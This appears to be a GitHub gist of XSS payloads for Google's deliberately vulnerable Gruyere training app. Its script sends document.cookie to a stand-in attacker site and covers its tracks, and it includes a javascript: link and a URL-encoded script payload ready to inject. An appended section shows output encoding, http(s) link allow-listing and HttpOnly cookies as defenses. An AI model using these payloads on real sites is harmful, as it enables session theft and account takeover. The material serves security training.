@keithstellyes
Last active November 7, 2016 05:34
An XSS script that does a few things
/*
* AUTHOR: Keith Stellyes
*
* This is for Google's deliberately vulnerable training app, http://google-gruyere.appspot.com/
* It contains several exploits for that app.
*
* At the very bottom is the exact HTML to insert into the profile.
* This specific attack assumes the attacker has a web page ready to listen. The script is put
* on the user page and sends the cookie data to the attacker's own server.
*
* FIRST: save the original HTML source of the page
* SECOND: generate a copy of the page that includes a request to our listening site
* THIRD: write that copy
* FOURTH: write the original source back
*
* Getting the page to show an alert: the injected script can be URL-encoded into the path
* (other payloads can be encoded the same way), e.g.
* http://google-gruyere.appspot.com/725437288779/%3Cscript%3Ealert(1)%3C/script%3E
*/
var myevilsite = 'google.com/';
var evillink = encodeURI(myevilsite + document.cookie);
var og_src = document.documentElement.outerHTML;
var src = og_src;
src += '<img src=\'' + evillink + '\'></img>';
/* In a real attack this alert would be omitted; it is left in for demonstration purposes */
alert(src);
document.open();
/* Write generated source */
document.write(src);
document.close();
document.open();
/* Write original source */
document.write(og_src);
document.close();
/* CODE TO INJECT (DELETE THE COMMENT MARKERS BEFORE AND AFTER THE SCRIPT): */
/*
<a href="javascript: function getleftpointybracket() {
return '<img>'[0]
}
var myevilsite = 'google.com/';
var evillink = encodeURI(myevilsite + document.cookie);
var og_src = document.documentElement.outerHTML;
var src = og_src;
src += '<img src=\'' + evillink + '\'></img>';
alert(src);
document.open();
document.write(src);
document.close();
document.open();
document.write(og_src);
document.close();">click me</a>
*/
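The gist relies on two injection contexts: profile text that the app echoes into the page unescaped (the `<script>alert(1)</script>` and `<img src=...>` payloads), and a profile link whose `href` the app accepts verbatim (the `javascript:` anchor). The example below is an added defensive counterpart, not part of the gist or of Gruyere itself: it encodes user input for the HTML text and attribute contexts and only accepts `http`/`https` links. The function names (`escapeHtml`, `safeHref`, `renderProfileLink`, `demo`) and the sample inputs are constructed for this example.

```javascript
// Added defensive example (not code from the gist): output encoding for the
// two contexts the gist's payloads target. All names here are hypothetical.

// Escape the five characters that let text break out of an HTML text node
// or a quoted attribute value.
function escapeHtml(str) {
  return String(str)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Allow only http(s) links in a user-supplied href. Browsers strip ASCII
// control characters and whitespace before parsing a URL scheme, so
// "java\tscript:" or " JavaScript:" would still run; strip them first and
// then require an explicit http(s) scheme rather than trying to deny-list.
function safeHref(url) {
  const cleaned = String(url).replace(/[\u0000-\u0020]/g, '');
  if (/^https?:\/\//i.test(cleaned)) {
    return cleaned;
  }
  return '#'; // inert fallback for anything that is not a plain web link
}

// Build the profile link with both the attribute and the text encoded.
function renderProfileLink(displayName, url) {
  return '<a href="' + escapeHtml(safeHref(url)) + '">' +
         escapeHtml(displayName) + '</a>';
}

// Constructed sample inputs modelled on the gist's payloads.
const samples = [
  { name: '<script>alert(1)</script>', url: 'https://example.com/' },
  { name: 'click me', url: 'javascript: alert(document.cookie)' },
  { name: 'click me', url: 'JaVa\tScRiPt:alert(1)' },
];

// Returns the rendered snippets so the result can be inspected or checked.
function demo() {
  return samples.map((s) => renderProfileLink(s.name, s.url));
}

demo().forEach((html) => console.log(html));
```

With this encoding the first sample renders as literal text, `&lt;script&gt;alert(1)&lt;/script&gt;`, and both `javascript:` links collapse to `href="#"`. Separately, marking the session cookie `HttpOnly` keeps it out of `document.cookie`, so even an injection that does execute has nothing to send to the listening server.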